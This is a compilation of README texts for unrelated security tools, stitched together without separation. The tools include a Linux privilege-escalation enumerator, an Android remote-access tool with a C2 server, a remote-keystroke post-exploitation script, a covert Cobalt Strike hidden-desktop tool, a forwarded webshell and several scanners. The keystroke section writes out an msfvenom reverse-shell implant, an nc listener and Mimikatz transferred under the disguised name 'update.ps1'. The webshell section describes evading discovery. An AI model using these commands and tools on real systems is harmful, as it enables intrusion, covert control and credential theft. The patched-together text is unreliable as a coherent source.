First, a couple of useful oneliners ;)
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
Note that since version 2.10
you can serve the script to other hosts with the -S
flag!
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse
tries to gradualy expose the information depending on its importance from a privesc point of view.
This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.
From version 2.0 it is mostly POSIX compliant and tested with shellcheck
and posh
.
It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p
parameter.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. The level 1
(./lse.sh -l1
) shows interesting information that should help you to privesc. The level 2
(./lse.sh -l2
) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.
The idea is to get the information gradually.
First you should execute it just like ./lse.sh
. If you see some green yes!
, you probably have already some good stuff to work with.
If not, you should try the level 1
verbosity with ./lse.sh -l1
and you will see some more information that can be interesting.
If that does not help, level 2
will just dump everything you can gather about the service using ./lse.sh -l2
. In this case you might find useful to use ./lse.sh -l2 | less -r
.
You can also select what tests to execute by passing the -s
parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro
will execute the test usr010
and all the tests in the sections net
and pro
.
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.
Also available in webm video
Direct execution oneliners
bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i
Remote adminitration tool for android
console git clone https://github.com/Tomiwa-Ot/moukthar.git
/var/www/html/
and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install
The default credentials are username: android
and password: the rastafarian in you
c2-server/.env
and web socket/.env
database.sql
console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
/etc/apache2/apache2.conf
xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
functionality/Utils.java
```java public static final String C2_SERVER = "http://localhost";public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target
A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.
All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.
$ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)
Options:
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)
-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)
-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not
specified)
-h, --help Display this help message
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain
$ ./rks.h -c recon_cmds.txt
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1
$ ./rks.sh -c implant.ps1
$ nc -lvnp 4444
$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1
$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64
tightvnc
.$ ./rks.sh -i implant.ps1 -w tightvnc
rdesktop
.$ ./rks.sh -i implant.bat -w rdesktop
Add text colors for better user experience
Implement Base64 file transfer
Implement Bin2Hex file transfer
Implement a persistence function for both windows and linux.
Implement antiforensics function for both windows and linux.
Implement to read shellcode input and run C# implant and powershell runspace
Implement privesc function for both windows and linux
Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.
There are four components of Hidden Desktop:
BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.
HVNC shellcode: PIC implementation of TinyNuke HVNC.
Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.
Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.
Download the latest release or compile yourself using make
. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:
HiddenDesktop <server> <port>
You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:
hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome
You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:
hd-launch <command> [args]
rportfwd
. Status updates are sent back to Beacon through a named pipe.InputHandler
function in the HVNC shellcode. It uses BeaconInjectProcess
to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.InputHandler
creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA
) or created (CreateDesktopA
). A new socket is established through a reverse port forward (rportfwd
) to the HVNC server. The input handler creates a new thread for the DesktopHandler
function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.DesktopHandler
establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:
Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.
Polaris can be run in three different modes:
Check out the documentation at docs.fairwinds.com
The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!
Enjoying Polaris? Check out some of our other projects:
If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.
Serial No. | Tool Name | Serial No. | Tool Name | |
---|---|---|---|---|
1 | whatweb | 2 | nmap | |
3 | golismero | 4 | host | |
5 | wget | 6 | uniscan | |
7 | wafw00f | 8 | dirb | |
9 | davtest | 10 | theharvester | |
11 | xsser | 12 | fierce | |
13 | dnswalk | 14 | dnsrecon | |
15 | dnsenum | 16 | dnsmap | |
17 | dmitry | 18 | nikto | |
19 | whois | 20 | lbd | |
21 | wapiti | 22 | devtest | |
23 | sslyze |
Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.
High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.
Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.
Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.
Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.
CVSS V3 SCORE RANGE SEVERITY IN ADVISORY 0.1 - 3.9 Low 4.0 - 6.9 Medium 7.0 - 8.9 High 9.0 - 10.0 Critical
Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. | Vulnerabilities to Scan | Serial No. | Vulnerabilities to Scan | |
---|---|---|---|---|
1 | IPv6 | 2 | Wordpress | |
3 | SiteMap/Robot.txt | 4 | Firewall | |
5 | Slowloris Denial of Service | 6 | HEARTBLEED | |
7 | POODLE | 8 | OpenSSL CCS Injection | |
9 | FREAK | 10 | Firewall | |
11 | LOGJAM | 12 | FTP Service | |
13 | STUXNET | 14 | Telnet Service | |
15 | LOG4j | 16 | Stress Tests | |
17 | WebDAV | 18 | LFI, RFI or RCE. | |
19 | XSS, SQLi, BSQL | 20 | XSS Header not present | |
21 | Shellshock Bug | 22 | Leaks Internal IP | |
23 | HTTP PUT DEL Methods | 24 | MS10-070 | |
25 | Outdated | 26 | CGI Directories | |
27 | Interesting Files | 28 | Injectable Paths | |
29 | Subdomains | 30 | MS-SQL DB Service | |
31 | ORACLE DB Service | 32 | MySQL DB Service | |
33 | RDP Server over UDP and TCP | 34 | SNMP Service | |
35 | Elmah | 36 | SMB Ports over TCP and UDP | |
37 | IIS WebDAV | 38 | X-XSS Protection |
git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
Template contributions , Feature Requests and Bug Reports are more than welcome.
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
Plug&Play - one line installation with Docker.
Scan various sources containing a set of keywords, e.g. ORGANIZATION-NAME.com
.
Currently supports:
Filter results with a built-in heuristic engine.
Enhance results with IOLs (Indicators Of Leak):
Allows to ignore public sources, (e.g., "junk" repositories by web crawlers).
OOTB ignore list of common "junk" sources.
Acknowledge a leak, and only get notified if the source has been modified since the previous scan.
Built-in ELK to search for data in leaks (including full index of Git repositories with IOLs).
Notify on new leaks
cd Leaktopus
cp .env.example .env
docker-compose up -d
In addition to the basic personal access token option, Leaktopus supports Github App authentication. Using Github App is recommended due to the increased rate limits.
To use Github App authentication, you need to create a Github App and install it on your organization/account. See Github's documentation for more details.
After creating the app, you need to set the following environment variables:
GITHUB_USE_APP=True
GITHUB_APP_ID
GITHUB_INSTALLATION_ID
- The installation id can be found in your app installation.GITHUB_APP_PRIVATE_KEY_PATH
(defaults to /app/private-key.pem
)Mount the private key file to the container (see docker-compose.yml
for an example). ./leaktopus_backend/private-key.pem:/app/private-key.pem
* Note that GITHUB_ACCESS_TOKEN
will be ignored if GITHUB_USE_APP
is set to True
.
If you wish to update your Leaktopus version (pulling a newer version), just follow the next steps.
git pull
# Force image recreation
docker-compose up --force-recreate --build
The built-in heuristic engine is filtering the search results to reduce false positives by:
OpenAPI documentation is available in http://{LEAKTOPUS_HOST}:8000/apidocs.
Service | Port | Mandatory/Optional |
---|---|---|
Backend (API) | 8000 | Mandatory |
Backend (Worker) | N/A | Mandatory |
Redis | 6379 | Mandatory |
Frontend | 8080 | Optional |
Elasticsearch | 9200 | Optional |
Logstash | 5000 | Optional |
Kibana | 5601 | Optional |
The above can be customized by using a custom docker-compose.yml file.
As for now, Leaktopus does not provide any authentication mechanism. Make sure that you are not exposing it to the world, and doing your best to restrict access to your Leaktopus instance(s).
Contributions are very welcomed.
Please follow our contribution guidelines and documentation.
██████╗ ███████╗███████╗██╗ ██╗███████╗██╗ ██╗
██╔══██╗██╔════╝██╔════╝██║ ██║███╔═══╝██║ ██║
██║ ██║█████╗ ███████╗███████║█████╗ ██║ ██║
██║ ██║██╔══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██████╔╝██║ ███████║██║ ██║███████╗████████╗███████╗
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝
D3Ext's Forwarded Shell it's a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in /dev/shm/.fs/ and there are stored the fifos. You can even have a tty over a webshell.
In case you want a good webshell with code obfuscation, login panel and more functions you have this webshell (scripted by me), you can change the username and the password at the top of the file, it also have a little protection in case of beeing discovered because if the webshell is accessed from localhost it gives a 404 status code
To use other forwarded shells you have to edit the script to change the url and the parameter of the webshell, but DFShell use parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter), the script have a pretty output with colors, you also have custom commands to upload and download files from the target, do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.
*If you change the actual user from webshell (or anything get unstable) then execute: 'sh'*
Install with pip
pip3 install dfshell
Install from source
git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements
One-liner
git clone https://github.com/D3Ext/DFShell && cd DFShell && pip3 install -r requirements
It's simple, you pass the url of the webshell and the parameter that executes commands. I recommend you the most simple webshell
python3 DFShell.py -u http://10.10.10.10/webshell.php -p cmd
OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:
OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:
OFRAK equips users with:
See ofrak.com for more details.
The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.
OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd
into the repository and run git lfs pull
.
See docs/environment-setup
for detailed instructions on how to install OFRAK.
OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.
If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md
.
The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.
Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.
Red Balloon Security is excited for security researchers and developers to contribute to this repository.
For details, please see our contributor guide and the Python development guide.
Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.
This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement “A” (Approved for Public Release, Distribution Unlimited).
A tool to automate the recon process on an APK file.
Slicer accepts a path to an extracted APK file and then returns all the activities, receivers, and services which are exported and have null
permissions and can be externally provoked.
Note: The APK has to be extracted via jadx
or apktool
.
Why?
I started bug bounty like 3 weeks ago(in June 2020) and I have been trying my best on android apps. But I noticed one thing that in all the apps there were certain things which I have to do before diving in deep. So I just thought it would be nice to automate that process with a simple tool.
Why not drozer?
Well, drozer is a different beast. Even though it does finds out all the accessible components but I was tired of running those commands again and again.
Why not automate using drozer?
I actually wrote a bash script for running certain drozer commands so I won't have to run them manually but there was still some boring stuff that had to be done. Like Checking the strings.xml
for various API keys, testing if firebase DB was publically accessible or if those google API keys have setup any cap or anything on their usage and lot of other stuff.
Why not search all the files?
I think that a tool like grep or ripgrep would be much faster to search through all the files. So if there is something specific that you want to search it would be better to use those tools. But if you think that there is something which should be checked in all the android files then feel free to open an issue.
Check if the APK has set the android:allowbackup
to true
Check if the APK has set the android:debuggable
to true
.
Return all the activities, services and broadcast receivers which are exported and have null permission set. This is decided on the basis of two things:
android:exporte=true
is present in any of the component and have no permission set.Intent-filters
are defined for that component, if yes that means that component is exported by default(This is the rule given in android documentation.)Check the Firebase URL of the APK by testing it for .json
trick.
myapp.firebaseio.com
then it will check if https://myapp.firebaseio.com/.json
returns something or gives permission denied.Check if the google API keys are publically accessible or not.
Duplicate
.not applicable
and will claim that the KEY has a usage cap
- r/suspiciouslyspecific Return other API keys that are present in strings.xml
and in AndroidManifest.xml
List all the file names present in /res/raw
and res/xml
directory.
Extracts all the URLs and paths.
git clone https://github.com/mzfr/slicer
cd slicer
python3 slicer.py -h
It's very simple to use. Following options are available:
Extract information from Manifest and strings of an APK
Usage:
slicer [OPTION] [Extracted APK directory]
Options:
-d, --dir path to jadx output directory
-o, --output Name of the output file(not implemented)
I have not implemented the output
flag yet because I think if you can redirect slicer output to a yaml file it will a proper format.
python3 slicer.py -d path/to/extact/apk -c config.json
The extractor module used to extract URLs and paths is taken from apkurlgrep by @ndelphit
All the features implemented in this are things that I've learned in past few weeks, so if you think that there are various other things which should be checked in an APK then please open an issue for that feature and I'd be happy to implement that :)
If you'd like you can buy me some coffee:
export PPSSWWDD=yourRootPswd
More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?
noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
---|---|---|---|---|---|---|---|---|---|
cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 |
panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 |
lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 |
xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 |
wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | ||
exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | ||
cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | ||||
rce | 313 | princechaddha | 147 | workflows | 187 | ||||
wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | ||||
tech | 282 | gy741 | 126 | file | 76 |
281 directories, 3922 files.
Support 7000+ web fingerprint scanning, identification:
Support 146 protocols and 90000+ rule port scanning
Fast HTTP sensitive file detection, can customize dictionary
Landing page detection
Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT
Supports multiple output types - JSON/TXT/CSV/STDOUT
Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]
Smart SSL Analysis:
Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs
Smart processing:
Automated supply chain identification, analysis and scanning
Link python3 log4j-scan
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable
Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.
support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr
Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling
download from Releases
go install github.com/hktalent/scan4all@2.6.9
scan4all -h
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh
# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v
more see: discussions